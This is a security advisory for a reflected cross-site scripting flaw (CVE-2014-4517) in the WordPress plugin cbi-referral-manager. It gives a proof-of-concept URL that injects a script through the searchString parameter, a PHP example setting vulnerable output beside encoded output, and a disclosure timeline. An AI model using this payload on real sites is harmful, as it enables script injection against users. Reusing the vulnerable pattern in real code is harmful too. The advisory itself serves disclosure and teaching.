wp-plugin : cbi-referral-manager – A3-Cross-Site Scripting (XSS)

Plugin Details

Plugin Name : cbi-referral-manager

Affected Version : 1.2.1 (and most probably lower versions, if any)

Vulnerability : A3-Cross-Site Scripting (XSS)

Identified by : Prajal Kulkarni

Technical Details

Minimum Level of Access Required : Unauthenticated

PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/cbireferralmanager/getNetworkSites.php?searchString=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&page=&search=Filter
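
As an added illustration (this is not the plugin's code, which is not reproduced on this page), the following standalone PHP script reconstructs the reflected-XSS pattern the PoC URL implies: the `searchString` parameter is written back unencoded into a quoted attribute of the search form, so a value starting with `">` closes the attribute and the tag, and the rest of the value is parsed as new markup. The form markup and the function names are assumptions. The hardened variant encodes the value for the HTML attribute context with `htmlspecialchars()`; inside WordPress, `esc_attr()` serves the same purpose. Run it with `php` on the command line; it decodes the parameter from the PoC URL the same way PHP populates `$_GET` and prints both renderings.

```php
<?php
// Added illustration, not the cbi-referral-manager code: the search form
// markup below is a constructed stand-in for whatever getNetworkSites.php
// actually emits, and the function names are assumptions.

// Vulnerable pattern: the search term is concatenated straight into a
// double-quoted attribute. A value containing "> terminates the attribute
// and the <input> tag, so anything after it becomes new markup.
function render_search_vulnerable(string $searchString): string
{
    return '<input type="text" name="searchString" value="' . $searchString . '">';
}

// Context-aware encoding for an HTML attribute value. ENT_QUOTES encodes both
// " and ', ENT_HTML5 selects the HTML5 entity table, and the explicit charset
// avoids mismatches between the encoder and the page's declared encoding.
function encode_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: same markup, but the user-controlled value is encoded
// before it is placed inside the attribute, so it can never close it.
function render_search_hardened(string $searchString): string
{
    return '<input type="text" name="searchString" value="'
        . encode_attr($searchString) . '">';
}

// Reproduce the request parameter exactly as the PoC URL carries it.
// parse_str() URL-decodes the values the same way PHP fills $_GET.
$pocUrl = 'http://127.0.0.1/wordpress/wp-content/wp-plugs/cbireferralmanager/'
        . 'getNetworkSites.php?searchString=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
        . '&page=&search=Filter';
parse_str((string) parse_url($pocUrl, PHP_URL_QUERY), $params);
$searchString = $params['searchString'] ?? '';

echo "Decoded parameter : {$searchString}\n";
echo "Vulnerable output : " . render_search_vulnerable($searchString) . "\n";
echo "Hardened output   : " . render_search_hardened($searchString) . "\n";

// Self-check a reviewer can keep around: after encoding, none of the
// characters that can break out of an attribute value survive in raw form.
$breakout = strpbrk(encode_attr($searchString), "<>\"'");
echo 'Attribute breakout after encoding: ' . ($breakout === false ? "none\n" : "POSSIBLE\n");
```

The vulnerable rendering shows the attribute closed early and a `<script>` element appearing after the `<input>`, while the hardened rendering keeps the whole decoded value inside `value="..."` as entities. Encoding must be chosen per output context: the attribute encoding above is not sufficient if the same value is later written into a JavaScript string or a URL, which need their own encoders.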

[Screenshot: XSS(3)]

Disclosure Timeline

Vendor Contacted : 2013-12-16

Plugin Status : Closed on 2014-01-11

Public Disclosure : April 25, 2014

CVE Number : CVE-2014-4517

Plugin Description :

This plugin implements a site link list in the sidebar page area. The list is sorted and filtered by the number of visitors sent from each particular link owner as well as relevance from matching keywords. The list can be limited to a number of results. Visitors can submit their site to the list and receive an affiliate link to place in their site.

New site submissions must be approved in the admin page.

This plugin will create a set of database tables to store unique visitors' IP addresses, affiliate details and affiliate traffic details.

Version: 1.2.1 Admin network sites now have searching and next/prev pages for available sites to add.
Version: 1.2.0 Admin cleanup. Preliminary support for global affiliate network. All approved sites are added to a global site repository that is available to all referral manager plugin users to add to their site.
Version: 1.1.1 Improves the ranking sorting with post title, body and category as well as new bullets to the links displayed.
Version: 1.1.0 Links are now ranked by relevance from keywords in visible post and the amount of traffic the site brings. Aesthetic cleanup.
Version: 1.0.2 Fixes a bug in the reffered.php file so that it loads the main site if the landing page is not set.
Version: 1.0.1 Cleans up the admin tools and includes an edit link function.
